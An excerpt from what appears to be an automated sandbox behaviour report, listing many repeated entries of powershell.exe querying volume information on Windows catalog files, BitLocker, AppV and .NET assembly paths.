Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
